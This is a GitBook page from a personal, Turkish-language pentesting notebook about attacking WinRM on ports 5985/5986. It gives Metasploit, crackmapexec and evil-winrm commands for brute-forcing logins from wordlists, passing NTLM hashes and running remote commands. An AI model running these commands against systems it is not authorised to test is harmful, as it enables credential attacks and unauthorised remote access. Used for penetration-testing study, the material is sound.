Tufan Turhan
  • Introduction
  • Red Teaming
    • Initial Access
      • VoipHopper
      • SMB – SCF File Attacks
      • MITM6
      • LLMNR, NBT-NS, mDNS Zehirlemeleri ve Relay Ataklar
    • Responder - DNS Injection
    • Privilege Escalation
      • PrintNightmare
      • Juicy Potato ile Windows Yetki Yükseltme
      • Token Impersonation with Incognito
    • Active Directory & Kerberos
      • Kerberos
      • Kerberosting
      • AS-REP Roasting
      • Overpass The Hash/Pass The Key (PTK)
      • DCSync Attack
      • DCShadow Attack
      • GETTGT
      • Golden Tickets
      • Silver Tickets
      • PowerView
      • MS14-025 (GPP Abusing)
      • BloodHound
      • Procdump
    • Lateral Movement
      • RDP MiTM-Hijacking
      • Vlan Hopping
      • Pivoting
    • Network Pentest
      • IPv4 Subnet Cheat Sheet
      • DNS Spoofing
      • DHCP Rogue
    • Shell to Meterpreter
    • Turn Off or Bypass AV
    • Useful CMD or Powershell Command
    • Brute Force
    • Windows Dosya İndirme
    • Windows UAC Bypass
    • Insecure Dosya İzni
  • Pentesting
    • Pentesting FTP - 21
    • Pentesting SMTP - 25,465,587
    • Pentesting SMB - 139 & 445
    • Pentesting Telnet - 23
    • Pentesting DNS - 53
    • Pentesting MSRPC -135
    • Pentesting SNMP - 161,162
    • Pentesting LDAP - 389,636
    • Pentesting MSSQL - 1433
    • Pentesting MYSQL - 3306
    • Pentesting RDP - 3389
    • Pentesing WINRM 5985,5986
  • Web Application
    • 2FA/OTP Bypass
    • Captcha Bypass
    • Cache Poisoning
    • Command Injection (OS)
    • CRLF Injection
    • Cross-site WebSocket hijacking (CSWSH) -
    • Cross-site request forgery (CSRF) -
    • Dangling Markup -
    • Path traversal
    • File Upload
    • Formula Injection (CSV Injection)
    • Login Bypass List
    • OAuth -
    • Open Redirect
    • Race Condition -
    • Registration - Password Reset & Takeover Vulnerabilities
    • SQL Injection
    • SSRF
  • Linux Privilege Escalation
    • PHP Wrapper
    • Simple Http
    • Editing /etc/passwd
    • SUID Binaries
    • Sudo Rights
    • Otomatize Araçlar
    • OSCP Not
  • HTB
  • Reverse Shell w/Msfvenom
  • Upgrading Simple Shells to Fully Interactive TTYs
Powered by GitBook
On this page
  • BruteForce & Login WinRM
  • Using Metasploit
  • Using Crackmapexec
  • Using Evil-WinRM
  1. Pentesting

Pentesing WINRM 5985,5986

WINRM sayesinden cihazlara uzaktan bağlanabiliriz.

BruteForce & Login WinRM

Using Metasploit

use auxiliary/scanner/winrm/winrm_login
msf auxiliary(scanner/winrm/winrm_login) > set rhosts 10.10.10.10
msf auxiliary(scanner/winrm/winrm_login) > set user_file /root/Desktop/user.txt
msf auxiliary(scanner/winrm/winrm_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(scanner/winrm/winrm_login) > set stop_on_success true
msf auxiliary(scanner/winrm/winrm_login) > run

Using Crackmapexec

crackmapexec winrm 10.10.10.10 -d <FORMULA1.local> -u usernames.txt -p passwords.txt
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH>
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

Using Evil-WinRM

evil-winrm -i <IP> -u username -p 'password'
evil-winrm -u <username> -H <Hash> -i <IP>
PreviousPentesting RDP - 3389Next2FA/OTP Bypass

Last updated 3 years ago